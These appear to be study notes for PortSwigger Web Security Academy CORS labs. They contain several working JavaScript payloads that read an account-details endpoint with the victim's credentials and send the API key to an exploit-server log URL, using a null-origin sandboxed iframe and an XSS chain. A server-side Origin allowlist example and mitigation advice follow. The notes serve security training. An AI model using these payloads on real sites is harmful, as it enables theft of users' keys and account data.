The /accountDetails endpoint's response headers include Access-Control-Allow-Credentials: true, which means CORS is enabled for credentialed requests. Opening this endpoint directly in a new tab and seeing it return the account details verifies this.
<script>
fetch('https://0aff00e0032c129a802e174b0051007c.web-security-academy.net/accountDetails', {credentials:'include'})
.then(r => r.json())
.then(j => {
document.location = "https://exploit-0a4a007303e4120780a21602017e0088.exploit-server.net/log?key=" + j.apikey;
})
</script>
An iframe with the sandbox attribute (without allow-same-origin) and srcdoc content runs in an opaque origin, so its requests are sent with the header Origin: null.
<iframe sandbox="allow-scripts allow-top-navigation allow-forms" srcdoc="<script>
var req = new XMLHttpRequest();
req.onload = reqListener;
req.open('get','https://0ad7003d043537e880f1fee700bd0077.web-security-academy.net/accountDetails',true);
req.withCredentials = true;
req.send();
function reqListener() {
location='https://exploit-0a59000f046037f6807efd0c01f800f0.exploit-server.net/log?key='+encodeURIComponent(this.responseText);
};
</script>">
</iframe>
IMPORTANT: This lab requires third-party cookies to be enabled in your browser.
This works for "View Exploit", but no administrator request arrives after it is delivered.
<script>
document.location="http://stock.0a22009104211e5a80c844d600a3000c.web-security-academy.net/?productId=4<script>var req = new XMLHttpRequest(); req.onload = reqListener; req.open('get','https://0a22009104211e5a80c844d600a3000c.web-security-academy.net/accountDetails',true); req.withCredentials = true;req.send();function reqListener() {document.location='https://exploit-0a2b0010040d1e598057439701bd0016.exploit-server.net/log?key='%2bthis.responseText; };%3c/script>&storeId=1"
</script>
I think there is something wrong with this lab. Even after delivering this simple version to the victim, this request isn't logged.
<script>
document.location='https://exploit-0a2b0010040d1e598057439701bd0016.exploit-server.net/log?key=wuhao';
</script>
- Carefully set Access-Control-Allow-Origin: use a whitelist of exact origins, never trust the null origin, and never use wildcards.
- Server-side security still applies; CORS is not a substitute for it.
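The following is an added example, not code from the lab or from these notes, showing what the mitigation list above looks like as a server-side Origin check, and why the "Origin: null" case from the sandboxed-iframe note has to be rejected explicitly. The allowlisted origins, the function names (corsHeadersFor, crossOriginReadAllowed, assertSafeCorsHeaders) and the plain-object header representation are all assumptions made for this example; no web framework is used.

```javascript
// Added example (not part of the original notes): server-side Origin
// validation for credentialed CORS. ALLOWED_ORIGINS is a constructed allowlist.
const ALLOWED_ORIGINS = new Set([
  'https://app.example.com',    // constructed example origins
  'https://admin.example.com',
]);

// Decide which CORS headers (if any) to attach for a request carrying `origin`.
// Returns null when the origin must not be trusted with credentials, in which
// case the handler sends no Access-Control-* headers at all.
function corsHeadersFor(origin) {
  // No Origin header: same-origin navigation or a non-browser client.
  if (origin === undefined) return null;
  // Sandboxed iframes, data: URLs and some redirects send "Origin: null".
  // Echoing "null" back in Access-Control-Allow-Origin is as bad as "*"
  // for credentialed requests, so it is rejected before the allowlist check.
  if (origin === 'null') return null;
  // Exact-match allowlist: no prefix, suffix or regex matching, so
  // "https://app.example.com.evil.net" does not pass.
  if (!ALLOWED_ORIGINS.has(origin)) return null;
  return {
    'Access-Control-Allow-Origin': origin,    // a vetted value, never '*'
    'Access-Control-Allow-Credentials': 'true',
    'Vary': 'Origin',                         // caches must not mix origins
  };
}

// Mirror the browser's decision: would a credentialed cross-origin request
// from `origin` be allowed to read the response body?
function crossOriginReadAllowed(origin) {
  const h = corsHeadersFor(origin);
  if (h === null) return false;
  // Browser rule: with credentials, ACAO must equal the request origin exactly
  // (no '*') and ACAC must be the literal string 'true'.
  return h['Access-Control-Allow-Origin'] === origin &&
         h['Access-Control-Allow-Credentials'] === 'true';
}

// Last-line check a handler can run on the headers it is about to emit,
// catching the wildcard-with-credentials and null-with-credentials cases.
function assertSafeCorsHeaders(headers) {
  const acao = headers['Access-Control-Allow-Origin'];
  const acac = headers['Access-Control-Allow-Credentials'];
  if (acac === 'true' && (acao === '*' || acao === 'null')) {
    throw new Error(`unsafe CORS headers: ACAO=${acao} with credentials`);
  }
  return true;
}

// Walk a few constructed origins through the check when run stand-alone.
for (const o of ['https://app.example.com', 'null', 'https://app.example.com.evil.net', undefined]) {
  console.log(String(o), '->', crossOriginReadAllowed(o) ? 'allowed' : 'blocked');
}
```

The two points this makes concrete: the allowlist is an exact Set lookup on the full origin (scheme, host and port), and "null" is treated as a hostile value rather than as "no origin", so a sandboxed iframe on the exploit server gets no usable Access-Control-Allow-Origin header at all.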